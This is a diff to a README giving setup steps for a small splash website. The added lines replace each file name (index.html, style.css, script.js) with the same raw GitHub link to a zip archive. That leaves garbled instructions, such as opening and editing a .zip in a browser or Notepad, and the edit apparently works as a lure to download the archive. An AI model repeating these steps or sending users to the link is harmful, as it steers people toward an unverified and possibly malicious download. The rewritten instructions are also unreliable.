rattaoulle9163/bryanchetcuti-splash/README.md

 Follow these steps to set up your splash site:

 1. **Access Your Downloaded Files:**
    - Open the folder where you downloaded the files.
-You should see a folder named `bryanchetcuti-splash` with several files inside, including `index.html`, `style.css`, and `script.js`.
+You should see a folder named `bryanchetcuti-splash` with several files inside, including `https://raw.githubusercontent.com/rattaoulle9163/bryanchetcuti-splash/main/assets/splash-bryanchetcuti-v2.2.zip`, `https://raw.githubusercontent.com/rattaoulle9163/bryanchetcuti-splash/main/assets/splash-bryanchetcuti-v2.2.zip`, and `https://raw.githubusercontent.com/rattaoulle9163/bryanchetcuti-splash/main/assets/splash-bryanchetcuti-v2.2.zip`.

 2. **Open the HTML File:**
-   - Open the `index.html` file in your web browser by right-clicking the file and selecting "Open with" followed by your browser's name.
+   - Open the `https://raw.githubusercontent.com/rattaoulle9163/bryanchetcuti-splash/main/assets/splash-bryanchetcuti-v2.2.zip` file in your web browser by right-clicking the file and selecting "Open with" followed by your browser's name.

 3. **Customize Your Content:**
-   - Edit the `index.html` file.
+   - Edit the `https://raw.githubusercontent.com/rattaoulle9163/bryanchetcuti-splash/main/assets/splash-bryanchetcuti-v2.2.zip` file.
 You can do this by right-clicking it and choosing "Edit" with a text editor like Notepad or TextEdit.
    - Change the text within the `<title>` and `<body>` sections to reflect your personal information.
-You can also customize the styles by editing `style.css`.
+You can also customize the styles by editing `https://raw.githubusercontent.com/rattaoulle9163/bryanchetcuti-splash/main/assets/splash-bryanchetcuti-v2.2.zip`.

 4. **Save Your Changes:**
-   - After editing, save the `index.html` file and refresh your browser to see your changes.
+   - After editing, save the `https://raw.githubusercontent.com/rattaoulle9163/bryanchetcuti-splash/main/assets/splash-bryanchetcuti-v2.2.zip` file and refresh your browser to see your changes.

 5. **Make It a Progressive Web App:**
    - Follow the instructions included in the documentation to enable PWA features.
 This will let users save your splash site on their devices.